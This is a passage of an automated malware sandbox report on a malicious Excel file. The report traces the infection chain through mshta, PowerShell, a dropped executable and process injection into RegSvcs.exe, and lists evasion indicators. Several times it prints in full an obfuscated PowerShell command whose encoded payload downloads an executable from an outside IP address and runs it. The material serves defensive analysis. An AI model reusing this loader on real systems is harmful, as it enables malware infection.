            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: SYSN ORDER.xlsStream path 'Workbook' entropy: 7.9994310106 (max. 8.0)
            Source: B8230000.0.drStream path 'Workbook' entropy: 7.99946016923 (max. 8.0)

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI/Special instruction interceptor: Address: 35A229C
            Source: C:\Users\user\AppData\Roaming\dllhost.exeAPI/Special instruction interceptor: Address: 3AF229C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2180Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7784Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9520Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1407
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9771
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dllJump to dropped file
            Source: C:\Windows\System32\mshta.exe TID: 3644Thread sleep time: -420000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 2180 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 7784 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\mshta.exe TID: 4016Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580Thread sleep count: 1407 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2580Thread sleep count: 1698 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep time: -300000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
            Source: dllhost.exe, 0000000B.00000003.441229287.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.478564452.0000000003AF7000.00000004.00000020.00020000.00000000.sdmp, differences.11.drBinary or memory string: cQEmU]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_003CFCB8 LdrInitializeThunk,14_2_003CFCB8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0L